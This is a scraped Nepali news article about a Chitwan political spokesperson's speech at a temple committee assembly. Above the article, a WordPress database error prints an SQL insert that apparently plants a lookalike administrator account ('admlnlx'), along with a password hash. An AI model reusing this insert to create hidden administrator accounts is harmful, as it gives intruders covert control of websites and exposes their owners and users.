WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BctSXTVm.EFELnQ6op3IpYpF2daDPK1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-19 00:08:54', '', 'admlnlx', 'admlnlx')
चितवन, माघ ८–
राप्रपा चितवनका प्रवक्ता जीवलाल पुरीले चितवन बिकासको लागी राजनीतिक स्वार्थभन्दामाथी उठेर एकिकृत दृष्टिकोण आवस्यक रहेको बताउनुभएको छ ।
कालिका नगरपालिका–४ कालिका स्थित कालिका भगवतीमाई नित्य पूजा तथा धार्मीक वन ब्यवस्थापन समितीको नवौ साधारणसभा र चौथो अधिवेसनको उद्घाटन गर्दै उहाँले राजनीतिक पार्टी जुनसुकै भएपनि स्वार्थ भन्दामाथी उठेर बिकाश गर्नको लागी सबैमा आग्रह गर्नुभयो । उहाँले आफ्नो भाषा संस्किृती जोगाउनको लागी र समग्र चितवनको बिकासको लागी आफु सधैव लागी पर्ने प्रतिबद्धता जनाउनुभयो ।
कालिका भगवतीमाई नित्य पूजा तथा धार्मीक वन ब्यवस्थापन समितीका अध्यक्ष ईमप्रसाद अधिकारीको सभापतित्वमा सम्पन्न भएको सो कार्यक्रममा वक्ताहरुले चितवनको पर्यटन बिकासका लागी कालिका मन्दिरलाई पर्यटकिय क्षेत्र बनाउनुपर्ने र यहाँको ठाउँलाई पिकनिक स्थलको रुपमा बिकास गर्नुपर्ने धारणा राखेका थिए ।